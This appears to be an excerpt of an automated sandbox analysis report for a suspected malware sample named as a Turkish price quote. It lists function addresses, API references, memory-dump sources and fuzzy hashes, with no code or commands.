Instruction ID: 7f1c89ad6af7e90ef362010c172199ce182668228c2da04d3b5ff31abd3ca19d
Opcode Fuzzy Hash: acd3069ced3aacc7fea5436eea9f2682e15db999ba07e007cde307d95f07f5a3
Instruction Fuzzy Hash: DD1133B08007488FDB20DF9AD449BDEBBF4EB48320F108859D529A7300C374A944CFA5

Function 067F6D6C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067F82B5), ref: 067F833F

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0e20fcc2fe27cd50bfd377b6ca22761614bb4245debdb1f72efae9858aac76ef
Instruction ID: 95d20f0634ae6db1ed45182aed2c1e44f09358a87f69772926a60f4be5e066c3
Opcode Fuzzy Hash: 0e20fcc2fe27cd50bfd377b6ca22761614bb4245debdb1f72efae9858aac76ef
Instruction Fuzzy Hash: 581106B58047498FCB50DF9AC849BDEBBF4EB48310F10845AD519A7350C775A944CFA5

Function 067F8BA1 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 067F8BFD

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: cd73f636116b502e12c009166d773b977d0e30e3918580a783bc8525f1c5a099
Instruction ID: 287133a2130ba9fa1139e775b0711e5b379bbf3a751bd6a903055e0edea0a026
Opcode Fuzzy Hash: cd73f636116b502e12c009166d773b977d0e30e3918580a783bc8525f1c5a099
Instruction Fuzzy Hash: 7D11F2B58007488FCB20DFAAD449BDABBF4EB48320F20855AD569A7241C774A544CFA5

Function 067F82D8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067F82B5), ref: 067F833F

Memory Dump Source

Source File: 00000008.00000002.4162660725.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_67f0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6ceeafbc31bff6ee5c13f935ee695367efee45f475ce5fc1214875a7b45d376d
Instruction ID: 9031073edf1dea27e6f65c30508d132cbf6cb5060b1cae2ac3a2f6ce84956171
Opcode Fuzzy Hash: 6ceeafbc31bff6ee5c13f935ee695367efee45f475ce5fc1214875a7b45d376d
Instruction Fuzzy Hash: BA11FEB58003498FCB10DF9AC949BDEBBF4AB48324F24881AD519A7350D374A944CFA5

Function 0686DB6D Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PHdq, xrefs: 0686DCC9

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: ba813c4eab9963b153a7e2ea711e605fdd896bbb260cfe62059b6ef9980c5fbf
Instruction ID: b0130a72a0d05aab39b1fddad893cf7ce625a998df92dce4c3ac313f1fb5a407
Opcode Fuzzy Hash: ba813c4eab9963b153a7e2ea711e605fdd896bbb260cfe62059b6ef9980c5fbf
Instruction Fuzzy Hash: 6441AF70F007499FDB61DF6AC8547AEBBB2AF85300F148929E506EB340EB71D946CB91

Function 06864821 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

XPiq, xrefs: 0686495D

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: XPiq
API String ID: 0-3497805733
Opcode ID: 2d8c9eb3a73726b3c27c36962bb73c8b4a77daef5bbfe950674b4ccc683031ac
Instruction ID: defd02a1f5374df102463036e8faba7e5e8c2ce4852a02c82eb3d13a14f935e7
Opcode Fuzzy Hash: 2d8c9eb3a73726b3c27c36962bb73c8b4a77daef5bbfe950674b4ccc683031ac
Instruction Fuzzy Hash: 79416D71F002089FDB55DFA9C814BAEBAF6EF88300F20856AE105EB395DA759C418F95

Function 06862285 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

PHdq, xrefs: 068623D3

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: f865549321cac29a9ac2d514fcd1bd36946a9d81996463878417e5e1349cd93b
Instruction ID: 062c1960ae3a0df2fbb7916f439c1bf2fa808487a3bfbd67ccc380c7de3d6987
Opcode Fuzzy Hash: f865549321cac29a9ac2d514fcd1bd36946a9d81996463878417e5e1349cd93b
Instruction Fuzzy Hash: 1B31CE30B003058FDB44AF36956466F7BA7EB89700F1048A9E406EB395DF35DE46CBA0

Function 06862298 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHdq, xrefs: 068623D3

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: 34065505f573fc2bcb1806c27c04c0cd11ce633312de4ce4b66525b5289a1780
Instruction ID: d2271b2d79e6e882b2f15e2e41ceb476fcc4225c6329f801c0c918a4dc793514
Opcode Fuzzy Hash: 34065505f573fc2bcb1806c27c04c0cd11ce633312de4ce4b66525b5289a1780
Instruction Fuzzy Hash: 6431B030B003058FDB54AB7AD96466E7AE7AB89300F1048A9E406EB394DF31DD46C7A1

Function 06867FB6 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

$dq, xrefs: 06867FDB

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq
API String ID: 0-847773763
Opcode ID: ead9485e4d86c677076012484ac7323875b34adf30577dbd3cea136544139d45
Instruction ID: 8a13b6251c00732f7bdedb873cf956580a3a591ceac9daea6114cb3584591fdb
Opcode Fuzzy Hash: ead9485e4d86c677076012484ac7323875b34adf30577dbd3cea136544139d45
Instruction Fuzzy Hash: 5DF0ED76B01205CFEFB48A56ED819BD7374EB60368F1048A3FE09C3154D771CA01C6A2

Function 068662A9 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9cee07d6af00babff3c0e10467509a66e82a99c6e77d0501c97c9e65048e701
Instruction ID: cebeb1b41d94ea1d9fd3af10785f7f4cda5c674bb9c472333c06cb6ba65d3196
Opcode Fuzzy Hash: a9cee07d6af00babff3c0e10467509a66e82a99c6e77d0501c97c9e65048e701
Instruction Fuzzy Hash: 22C1A030E002458FDB64DF69D594AADB7F2EF84310F248569E605DB395EB30ED82CB52

Function 068686E8 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d945d2f7641a14578a3bde86a96f5fe714371e74406aa5b8c5fbb88ea709f0
Instruction ID: bb3da0f5a6057ed799c9aeec0b40f697e2c0f296163e4892766b53b3ebed7c34
Opcode Fuzzy Hash: e5d945d2f7641a14578a3bde86a96f5fe714371e74406aa5b8c5fbb88ea709f0
Instruction Fuzzy Hash: E4A16B70B002158FDB54EF79C95076EB7F2EF89200F1085A9E509EB395DB319D82CBA1

Function 06865EB8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda79079987a07ffa13f415eef9e8733196efad8413809a6712e37888bab20a9
Instruction ID: b1c141fd99057f075ced00531e84f8e361d88e1b0eababe00d1b8e954f30dae5
Opcode Fuzzy Hash: dda79079987a07ffa13f415eef9e8733196efad8413809a6712e37888bab20a9
Instruction Fuzzy Hash: 0761C371F001214FDF509A7EC88066FBADBAFD4620B254439E90EDB364DEA5ED4287D2

Function 06863F69 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0c0c55e305d538b0012cc43bbce1635dd4c1f83e84cf5f5f0095f903650c8c
Instruction ID: a2c7c30918f1acfffc3e4d0979a97b8e01462f98dcfa913333de1fce0ea8640b
Opcode Fuzzy Hash: cb0c0c55e305d538b0012cc43bbce1635dd4c1f83e84cf5f5f0095f903650c8c
Instruction Fuzzy Hash: 10817030B006099FDB94DFA9C5547AEB7F3EF99314F208529E51ADB394DA30DC428B91

Function 06864284 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61229f41c6f8878bac5dc1eccb0a195772e8849e1a855eca50a961e79a2ac0f
Instruction ID: 478f40666bfd9452c04bc3d403086ae8fa170f5e0223ccd500ed62317066a000
Opcode Fuzzy Hash: c61229f41c6f8878bac5dc1eccb0a195772e8849e1a855eca50a961e79a2ac0f
Instruction Fuzzy Hash: 1B913B34E002198BDF60DF69C840B9DB7B1FF89310F208699E549EB295DB70AA85CF91

Function 06864298 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 121e2055f5b73919e89055d06f2e80178a8643124e397ad48cb1cab0712a9588
Instruction ID: b057fe2f7ed6b7deb94e0529bf0b8a6322b010f7a4c768ed0fa32826537585af
Opcode Fuzzy Hash: 121e2055f5b73919e89055d06f2e80178a8643124e397ad48cb1cab0712a9588
Instruction Fuzzy Hash: 1C912A74E002198BDF60DF69C880B9DB7B1FF89310F208599E549FB295DB70AA85CF90

Function 0686EBBB Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0272d6b6c493d66a627cb0dbcd0371843fb24979cb05107a64e09b92b587e84f
Instruction ID: fac6e4094d586a468cc6a14af1e1c9f42483e3fa43ac9c9f19635e0f42f92bfe
Opcode Fuzzy Hash: 0272d6b6c493d66a627cb0dbcd0371843fb24979cb05107a64e09b92b587e84f
Instruction Fuzzy Hash: 20713D74E042089FDB54DFAAD984AAEBBF6EF84300F148469E006EB355DB30ED46CB50

Function 0686EBC8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e925d647217206d87286b60921ed3f46195fc055b6e3f87a37e47015e2a68339
Instruction ID: c61781e4bc658ba93322a864d2e46c9b0d1203c4bc9296a92ea9147ce264247d
Opcode Fuzzy Hash: e925d647217206d87286b60921ed3f46195fc055b6e3f87a37e47015e2a68339
Instruction Fuzzy Hash: 07712D74A002099FDB54DFAAD984AAEBBF6FF84300F148469E406EB355DB30ED46CB50

Function 0686FD28 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cd1f50fe786679447fe238b97ce4ccfebd247967fb6b3eb63d42d2816e69c4
Instruction ID: 87f21319b1d0ede36d68e0ca4157c6ab4c18950e2955d571a450f4c97e4b5c53
Opcode Fuzzy Hash: 57cd1f50fe786679447fe238b97ce4ccfebd247967fb6b3eb63d42d2816e69c4
Instruction Fuzzy Hash: 3051D031E001059FDB64AB7AF4446ADBBB3FB85315F108869E306EB291DF31D956CB81

Function 0686F6D1 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c68f26710fef94ea2aafb7a862f5d49b7ed6d6fcefdb01fdd40857ede4bfce2
Instruction ID: 6fde86b1666424f1fd63f4f9b2cc318c4ec30e1e783c27f34641c4af48a4a224
Opcode Fuzzy Hash: 3c68f26710fef94ea2aafb7a862f5d49b7ed6d6fcefdb01fdd40857ede4bfce2
Instruction Fuzzy Hash: 5951C570B202145BEFA4666DE85473E36ABD789311F20846AF70AD73A4CF68CC4157A2

Function 0686F6E0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c073dd755cda2e5dc097f5646901a5892c8716decd52a8db00d64955331c01a
Instruction ID: 50c5cdb0010ea5bddc3274b448ec85c59dd85ce6e6267db5ee2ad5360b1323ee
Opcode Fuzzy Hash: 8c073dd755cda2e5dc097f5646901a5892c8716decd52a8db00d64955331c01a
Instruction Fuzzy Hash: 1951A670B202145BEF64666DE89472F36ABD789311F208469F70ED73E4CF68CC8157A2

Function 068650D9 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528108a95f9c398d2369b61944c5bec5879da9cdbe3a611baef90f169e7ea242
Instruction ID: 60b1cce965fd839ee945f3870093c29788af05032753966cfc83b3c2b59bab6b
Opcode Fuzzy Hash: 528108a95f9c398d2369b61944c5bec5879da9cdbe3a611baef90f169e7ea242
Instruction Fuzzy Hash: A1414E71E006098FDF70CE9AD881ABFF7B2FB48310F10492AE256D7640D730A9458B92

Function 06862148 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090ab41a3ef57355469d6b047fb1f4f11652ec80d0d30e55e34d806dbb29f5b3
Instruction ID: 03061107c1213d7c0eed6e6125ebf07dd71292cd18b86648386a5ea0d8531aae
Opcode Fuzzy Hash: 090ab41a3ef57355469d6b047fb1f4f11652ec80d0d30e55e34d806dbb29f5b3
Instruction Fuzzy Hash: AD31C030E146069BCB45CF65C46469EB7B2EF89300F10C969EA16EB350DB71AD42CB50

Function 06862158 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e0a901b07520c20ab62b37ed2c3763326366ed7c6d740e6dcb0f85bea5a30d8
Instruction ID: 9d16d321c43714dbf3ffe6f08de9fa35b159fa5db619f2bb5dd31bd666446dff
Opcode Fuzzy Hash: 8e0a901b07520c20ab62b37ed2c3763326366ed7c6d740e6dcb0f85bea5a30d8
Instruction Fuzzy Hash: D331AE30E1461A9FCB18CF65C86469EB7B2FF89310F10C929EA16EB350DB71AD42CB50

Function 06863B71 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f331eaf48220cb803dc13ef10a89356ad81537b663eb51c1f4ca847934dcfb
Instruction ID: 31342b20556fda12b8d620656009c8f51c09c931ff53cda27b45df904f3c07a0
Opcode Fuzzy Hash: f5f331eaf48220cb803dc13ef10a89356ad81537b663eb51c1f4ca847934dcfb
Instruction Fuzzy Hash: 38318D75E01A159FDB60DF69D880AAEBBF5AB48320F148169F905E7298EB30D8418B94

Function 06863B80 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b76ecee6896da591e1f00320012785556b9b0819c730187d5e7785f516541fe
Instruction ID: 12bb1cba62da44b7c7119e75e9af2be14673297247aae49dff618cceb7390654
Opcode Fuzzy Hash: 9b76ecee6896da591e1f00320012785556b9b0819c730187d5e7785f516541fe
Instruction Fuzzy Hash: 90218E75F016199FEB90DF6AD980AAEB7F6FB88710F108065E905E7358EB30D8418B94

Function 00DFD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4147857627.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_dfd000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fa4ad9e451ed1b1696a3643e7e8ec6bdaba26ff9853b92814965cee0c6d566
Instruction ID: c8a91146184c53b6fdee8281c21483ff9cd66a3e90a72950222d33255376be51
Opcode Fuzzy Hash: d3fa4ad9e451ed1b1696a3643e7e8ec6bdaba26ff9853b92814965cee0c6d566
Instruction Fuzzy Hash: B921F571604348AFCB15DF14D9C4B26BBA7FB84314F24C96DEA4A4B381CB36D846DA71

Function 06865258 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 835b4229082d748002b9d6445ffc89329e06554e8503e911455b29f8db560a8a
Instruction ID: 0c38cb75bebca796a74fe75de26b0fd6283d3b0f55fecdf20fd1e67cac4a40d3
Opcode Fuzzy Hash: 835b4229082d748002b9d6445ffc89329e06554e8503e911455b29f8db560a8a
Instruction Fuzzy Hash: 8421E471E042054FCF618FABC5C077EFBB1EB46210F15887AE159DB242D2B4D9408792

Function 06869FC0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9090ada7d591b82ca29e2714e9e9ae054e8833d359ad95dc81d03b6b1b3456
Instruction ID: 51c9aaae148c99ef288da6fefae430d88956b2234d9a667d62b8bf020e61cf1a
Opcode Fuzzy Hash: 7f9090ada7d591b82ca29e2714e9e9ae054e8833d359ad95dc81d03b6b1b3456
Instruction Fuzzy Hash: B5112C31F041158FCF51DA6DE850B6EB3E6EB86714F11C466F209D7280DAB1DC058792

Function 06863C90 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44373eefa971db222bec87419a684625f3bcab30946a06daad3c7fd43d91bf82
Instruction ID: 26af5904998968174a08235bc944e0ed9c82f81742217aaca5e1ecf8d501e7de
Opcode Fuzzy Hash: 44373eefa971db222bec87419a684625f3bcab30946a06daad3c7fd43d91bf82
Instruction Fuzzy Hash: 1D110431B000289FDB949A79C9106AE77FAEBC8701F008439E80BE7348EE34DC028BD1

Function 068686DB Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8ca11fb79a30123d67357f2d71dc9243fd9f3f25ca81a6ca25ca74801473a2b
Instruction ID: 9b1bc33ca15c6c2eabca989715ac482590fe6147fcd2b57eba02e760a3242fa2
Opcode Fuzzy Hash: e8ca11fb79a30123d67357f2d71dc9243fd9f3f25ca81a6ca25ca74801473a2b
Instruction Fuzzy Hash: D411E535F101145FEF60DB29D8507AE7BB6DB85310F0044B9E10ED7284CB319D428FA2

Function 06863EC8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e43719434fc8a60225b9667216c1f55c33549c7452be2e08d0a4ee2bd4b9719d
Instruction ID: 7908f42a8ac17bc94409450db2c21b602807cf6098bb021f6de4fc5ff0d087a4
Opcode Fuzzy Hash: e43719434fc8a60225b9667216c1f55c33549c7452be2e08d0a4ee2bd4b9719d
Instruction Fuzzy Hash: 61019E31B141100FDB65DABE985472FB7EADBD5720F24C82AF20EC7395E966DC4283A1

Function 0686EE37 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd613cd5beb877c92853d6e4b813a74e037a9937f84b21c6b89d708bd19a5f1
Instruction ID: 89333a265d51e1751cd25f1d1acb9a755e32f0fda0eb45c00632c8a628dfdcea
Opcode Fuzzy Hash: 8fd613cd5beb877c92853d6e4b813a74e037a9937f84b21c6b89d708bd19a5f1
Instruction Fuzzy Hash: 1C01F235B181204FDB619A7D945877E67E7DBCA610F18CC2AF20EC7381ED21DC028394

Function 06863948 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768be317d4858cf36d81d91fe002f09b470669525fb5d569fb20a1a175921b77
Instruction ID: 8d762b8f1ed1373b6879b56dce945dcf38c46ac2b0ecf8a391348874fdfec448
Opcode Fuzzy Hash: 768be317d4858cf36d81d91fe002f09b470669525fb5d569fb20a1a175921b77
Instruction Fuzzy Hash: 2E2103B5D00259AFCB00DF9AD884ADEFFB4FB49310F10812AE918A7341C774A944CFA4

Function 00DFD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4147857627.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_dfd000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 89a3d56faf61419b3710b468ef6ea4d34ae8c3d5c1c75465403d4d93520a7d9f
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: DD11D075504288DFCB11CF10C5C4B25BB72FB44314F28C6ADD9494B252C73AD84ACF61

Function 06863C7F Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c917bda80f40469604e6ffe99555c48bfaa7529f5da3039a12b81c7459e5fe26
Instruction ID: f2073f2525ee0bb5f7d4c0423d795b776f0ddd8047acabf96316a5cc3b073123
Opcode Fuzzy Hash: c917bda80f40469604e6ffe99555c48bfaa7529f5da3039a12b81c7459e5fe26
Instruction Fuzzy Hash: 5D01DF32B1402A6BEB949A6ACC146AF76BADBC9614F00413AE50AD3285EE64CD0247D1

Function 06863950 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7e9079986099861db9cb74ca844e2bf5bcbe3ae07a4c4228025889db356bad
Instruction ID: c3b3dd2145ce3c41bfae5929a116634ea3c767067b21bd58aca0e9847feab3fd
